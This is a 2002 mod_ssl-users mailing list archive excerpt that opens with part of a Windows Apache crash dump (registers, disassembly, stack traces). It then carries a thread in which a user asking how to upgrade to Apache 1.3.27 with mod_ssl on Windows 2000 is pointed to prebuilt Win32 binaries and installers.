        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0347FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0347FF78 6FF6B62A 00000026 780060CE 00000026 0012FFB0 =
kernel32!WaitForSingleObject=20
0347FFB4 77E96523 005D6C48 0012FFB0 0012FFB0 005D6C48 !ap_start_restart =

0347FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x554

eax=3D0430f0b8 ebx=3D00000000 ecx=3D0000000d edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0357fee4 ebp=3D0357ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:03ffd4b7=3D00000000
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5df=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0357FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0357FF78 6FF6B62A 00000027 780060CE 00000027 0012FFB0 =
kernel32!WaitForSingleObject=20
0357FFB4 77E96523 005D6CD0 0012FFB0 0012FFB0 005D6CD0 !ap_start_restart =

0357FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x550

eax=3D7ff90c00 ebx=3D00000000 ecx=3D0367fd5c edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0367fee4 ebp=3D0367ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:040fd4b7=3D00000000
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:040fd32e=3D00000000
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0367FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0367FF78 6FF6B62A 00000028 780060CE 00000028 0012FFB0 =
kernel32!WaitForSingleObject=20
0367FFB4 77E96523 005D6D58 0012FFB0 0012FFB0 005D6D58 !ap_start_restart =

0367FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x54c

eax=3D005d6d49 ebx=3D00000000 ecx=3D00000000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0377fee4 ebp=3D0377ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:041fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0377FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0377FF78 6FF6B62A 00000029 780060CE 00000029 0012FFB0 =
kernel32!WaitForSingleObject=20
0377FFB4 77E96523 005D6DE0 0012FFB0 0012FFB0 005D6DE0 !ap_start_restart =

0377FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x548

eax=3D006129c8 ebx=3D00000000 ecx=3D00000000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0387fee4 ebp=3D0387ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:042fd4b7=3D00000000
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0387FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0387FF78 6FF6B62A 0000002A 780060CE 0000002A 0012FFB0 =
kernel32!WaitForSingleObject=20
0387FFB4 77E96523 005D6E68 0012FFB0 0012FFB0 005D6E68 !ap_start_restart =

0387FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x4c8

eax=3D00000000 ebx=3D00000000 ecx=3D0051ec58 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D0397fee4 ebp=3D0397ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:043fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00f9c22a=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0397FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
0397FF78 6FF6B62A 0000002B 780060CE 0000002B 0012FFB0 =
kernel32!WaitForSingleObject=20
0397FFB4 77E96523 005D6EF0 0012FFB0 0012FFB0 005D6EF0 !ap_start_restart =

0397FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x4cc

eax=3D00000004 ebx=3D00000000 ecx=3D00000000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D03a7fee4 ebp=3D03a7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:044fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
03A7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
03A7FF78 6FF6B62A 0000002C 780060CE 0000002C 0012FFB0 =
kernel32!WaitForSingleObject=20
03A7FFB4 77E96523 005D6F78 0012FFB0 0012FFB0 005D6F78 !ap_start_restart =

03A7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x544

eax=3D00000000 ebx=3D00000000 ecx=3D05000101 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D03b7fee4 ebp=3D03b7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          ss:045f=
d4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:05a7d6d3=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
03B7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
03B7FF78 6FF6B62A 0000002D 780060CE 0000002D 0012FFB0 =
kernel32!WaitForSingleObject=20
03B7FFB4 77E96523 005D7008 0012FFB0 0012FFB0 005D7008 !ap_start_restart =

03B7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x540

eax=3D041169c0 ebx=3D00000000 ecx=3D0000000e edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D03c7fee4 ebp=3D03c7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:046fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5e0=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
03C7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
03C7FF78 6FF6B62A 0000002E 780060CE 0000002E 0012FFB0 =
kernel32!WaitForSingleObject=20
03C7FFB4 77E96523 005D7090 0012FFB0 0012FFB0 005D7090 !ap_start_restart =

03C7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x100

eax=3D005d7118 ebx=3D00000000 ecx=3D00000000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D03d7fee4 ebp=3D03d7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:047fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
03D7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D ntdll!NtWaitForSin=
gleObject=20
03D7FF78 6FF6B62A 0000002F 780060CE 0000002F 0012FFB0 =
kernel32!WaitForSingleObject=20
03D7FFB4 77E96523 005D7118 0012FFB0 0012FFB0 005D7118 !ap_start_restart =

03D7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x51c

eax=3D00001000 ebx=3D00000000 ecx=3D00000088 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D03e7fee4 ebp=3D03e7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:048fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d65a=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
03E7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
03E7FF78 6FF6B62A 00000030 780060CE 00000030 0012FFB0 =
kernel32!WaitForSingleObject=20
03E7FFB4 77E96523 005D71A0 0012FFB0 0012FFB0 005D71A0 !ap_start_restart =

03E7FFEC 00000000 00000000 00000000 00000000 00000000 =
kernel32!TlsSetValue=20

State Dump for Thread Id 0x530

eax=3D0000002e ebx=3D00000000 ecx=3D00000000 edx=3D00000000 =
esi=3D77f827dd edi=3D000002b8
eip=3D77f827e8 esp=3D03f7fee4 ebp=3D03f7ff08 iopl=3D0         nv up ei =
pl zr na po nc
cs=3D001b  ss=3D0023  ds=3D0023  es=3D0023  fs=3D0038  gs=3D0000        =
     efl=3D00000246


function: NtWaitForSingleObject
        77f827dd b8ea000000       mov     eax,0xea
        77f827e2 8d542404         lea     edx,[esp+0x4]          =
ss:049fd4b7=3D????????
        77f827e6 cd2e             int     2e
        77f827e8 c20c00           ret     0xc
        77f827eb 8b4124           mov     eax,[ecx+0x24]         =
ds:00a7d5d2=3D????????
        77f827ee 39420c           cmp     [edx+0xc],eax          =
ds:00a7d5d2=3D????????
        77f827f1 0f85c9100000     jne     NtQueryDefaultLocale+0x115 =
(77f838c0)
        77f827f7 ff4208           inc     dword ptr [edx+0x8]    =
ds:00a7d5d2=3D????????
        77f827fa 33c0             xor     eax,eax
        77f827fc c20400           ret     0x4
        77f827ff 90               nop
        77f82800 ff4a04           dec     dword ptr [edx+0x4]    =
ds:00a7d5d2=3D????????
        77f82803 c20400           ret     0x4

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
03F7FF08 77E83B5B 000002B8 FFFFFFFF 00000000 6FF85F8D =
ntdll!NtWaitForSingleObject=20
03F7FF78 6FF6B62A 00000031 780060CE 00000031 0012FFB0 =
kernel32!WaitForSingleObject=20
03F7FFB4 77E96523 005D7228 0012FFB0 0012FFB0 005D7228 !ap_start_restart =

03F7FFEC 00000000 78006073 005D7228 00000000 00000008 =
kernel32!TlsSetValue=20

*----> Raw Stack Dump <----*
03f7fee4  33 3b e8 77 b8 02 00 00 - 00 00 00 00 00 00 00 00  =
3;.w............
03f7fef4  18 06 00 00 18 95 60 00 - c0 75 14 00 20 e5 57 00  =
......`..u.. .W.
03f7ff04  20 e5 57 00 78 ff f7 03 - 5b 3b e8 77 b8 02 00 00   =
.W.x...[;.w....
03f7ff14  ff ff ff ff 00 00 00 00 - 8d 5f f8 6f b8 02 00 00  =
........._.o....
03f7ff24  ff ff ff ff 38 b5 f6 6f - b8 02 00 00 c3 b6 f6 6f  =
....8..o.......o
03f7ff34  18 06 00 00 b0 ff 12 00 - 28 72 5d 00 28 72 5d 00  =
........(r].(r].
03f7ff44  02 00 01 bb c0 a8 01 0b - 00 00 00 00 00 00 00 00  =
................
03f7ff54  02 00 08 46 c0 a8 01 fc - 00 00 00 00 00 00 00 00  =
...F............
03f7ff64  50 95 60 00 18 95 60 00 - 39 01 00 00 18 06 00 00  =
P.`...`.9.......
03f7ff74  10 00 00 00 b4 ff f7 03 - 2a b6 f6 6f 31 00 00 00  =
........*..o1...
03f7ff84  ce 60 00 78 31 00 00 00 - b0 ff 12 00 b0 ff 12 00  =
.`.x1...........
03f7ff94  28 72 5d 00 a0 cd 7a 85 - 8c ff f7 03 77 0d 43 80  =
(r]...z.....w.C.
03f7ffa4  dc ff f7 03 b8 ff 00 78 - a8 35 03 78 00 00 00 00  =
.......x.5.x....
03f7ffb4  ec ff f7 03 23 65 e9 77 - 28 72 5d 00 b0 ff 12 00  =
....#e.w(r].....
03f7ffc4  b0 ff 12 00 28 72 5d 00 - 00 70 f8 7f ff ff ff ff  =
....(r]..p......
03f7ffd4  c0 ff f7 03 ff ff ff ff - ff ff ff ff 3c d4 e9 77  =
............<..w
03f7ffe4  08 79 e8 77 00 00 00 00 - 00 00 00 00 00 00 00 00  =
.y.w............
03f7fff4  73 60 00 78 28 72 5d 00 - 00 00 00 00 08 00 00 00  =
s`.x(r].........
03f80004  02 01 00 00 ee ff ee ff - 00 00 00 00 00 00 51 00  =
..............Q.
03f80014  00 f0 01 00 00 00 f8 03 - 00 02 00 00 40 00 f8 03  =
............@...

------_=_NextPart_000_01C27196.22F77130--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 12 22:08:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA07098; Sat, 12 Oct 2002 22:07:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts14-srv.bellnexxia.net id WAA07076; Sat, 12 Oct 2002 22:07:01 +0200 (MET DST)
Received: from sympatico.ca ([64.231.125.186]) by tomts9-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021011033125.XXUL14901.tomts9-srv.bellnexxia.net@sympatico.ca>
          for ; Thu, 10 Oct 2002 23:31:25 -0400
Message-ID: <3DA6462D.6040606@sympatico.ca>
Date: Thu, 10 Oct 2002 23:31:57 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Win32 & Apache 1.3.27
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Justin Annear wrote:
> Hi All,
> 
> Im a little new to the Apache & Mod_ssl scene and as such have used the
> 1.3.26 pre-compiled version on the modssl.org website.
> 
> I noticed recently that 1.3.27 (Apache) has been released and as such am
> wanting to upgrade asap to this version.
> 
> Im running Apache on a Windows 2000 server, due to reasons beyond my
> control and as such am hoping that I can obtain either one of two things
> 
> a) a pre-compiled version of apache 1.3.27 with modssl
> 
> or
> 
> b) instructions (clear and detailed due to my limited understanding of
> this topic) on how to upgrade apache and still keep my mod_ssl stuff
> intact. 
> I've upgraded my current mod_ssl to the latest versions etc.
> 
> I've looked into compiling a version myself as I dont believe this will
> be provided by modssl.org with limited success.
> 
> Thanks in advance
> 
> Justin Annear
> Ballarat Secondary College
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Justin,

I built these binaries last week...

http://hunter.campbus.com/Apache_1.3.27-Mod_SSL_2.8.11-OpenSSL_0.9.6g-Win32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip

If you have any problems contact me on the list, as
 or at my personal account: hunter@tor.ath.cx

There are other sources, some more comprhensive than mine.


Victor's installer has just about anything you could want ...
Apache, OpenSSL, TomCat, Ant, PHP, MySQL, etc

vmedina98@unitec.edu.ve

Server Installer
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/IKIRUX_WSP_Pro1Beta3_ENG.exe

Installation Guide:
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server 
Installation Guide.pdf

Release Notes:

ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server 
Release Notes.pdf


Another nice package is...

OpenSA web server :: Next Generation Web Serving
http://www.opensa.org/

If you really want to roll your own I have some instructions that I put 
together ... very messy but easy to follow.  Ask and I will send it to 
you I am not going to torture the list with it again.

OR let me know how you are making out...

Chris.

Legal Notice
------------

These software packages are provided free of charge. It uses strong 
cryptography that is regulated by export/import/use restrictions in some 
parts of the world.

PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG CRYPTOGRAPHY SOFTWARE, 
PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL 
DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE 
WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE 
IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR SOURCE PATCHES 
TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE 
ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY TO YOU. WE NOR THE 
AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR WILL BE HELD LIABLE 
FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR RESPONSIBILITY.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct 13 13:02:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA00932; Sun, 13 Oct 2002 13:01:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bsce5.ballaratsc.vic.edu.au id NAA00906; Sun, 13 Oct 2002 13:00:14 +0200 (MET DST)
Received: from bscpri-MTA by bsce5.ballaratsc.vic.edu.au
	with Novell_GroupWise; Sun, 13 Oct 2002 21:00:07 +1000
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Sun, 13 Oct 2002 20:59:50 +1000
From: "Justin Annear" 
To: 
Subject: Re: Win32 & Apache 1.3.27
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Justin Annear" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Chris,

Cheers for those binaries. It certainly was a pain free install and I am
now running 1.3.27 as planned/required.

Once again, thanks.

Justin

>>> theantigod@sympatico.ca 10/13/02 06:09 AM >>>
Justin Annear wrote:
> Hi All,
> 
> Im a little new to the Apache & Mod_ssl scene and as such have used
the
> 1.3.26 pre-compiled version on the modssl.org website.
> 
> I noticed recently that 1.3.27 (Apache) has been released and as such
am
> wanting to upgrade asap to this version.
> 
> Im running Apache on a Windows 2000 server, due to reasons beyond my
> control and as such am hoping that I can obtain either one of two
things
> 
> a) a pre-compiled version of apache 1.3.27 with modssl
> 
> or
> 
> b) instructions (clear and detailed due to my limited understanding of
> this topic) on how to upgrade apache and still keep my mod_ssl stuff
> intact. 
> I've upgraded my current mod_ssl to the latest versions etc.
> 
> I've looked into compiling a version myself as I dont believe this
will
> be provided by modssl.org with limited success.
> 
> Thanks in advance
> 
> Justin Annear
> Ballarat Secondary College
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Justin,

I built these binaries last week...

http://hunter.campbus.com/Apache_1.3.27-Mod_SSL_2.8.11-OpenSSL_0.9.6g-Win32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip

If you have any problems contact me on the list, as
 or at my personal account: hunter@tor.ath.cx

There are other sources, some more comprhensive than mine.


Victor's installer has just about anything you could want ...
Apache, OpenSSL, TomCat, Ant, PHP, MySQL, etc

vmedina98@unitec.edu.ve

Server Installer
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/IKIRUX_WSP_Pro1Beta3_ENG.exe

Installation Guide:
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server 
Installation Guide.pdf

Release Notes:

ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server 
Release Notes.pdf


Another nice package is...

OpenSA web server :: Next Generation Web Serving
http://www.opensa.org/

If you really want to roll your own I have some instructions that I put 
together ... very messy but easy to follow.  Ask and I will send it to 
you I am not going to torture the list with it again.

OR let me know how you are making out...

Chris.

Legal Notice
------------

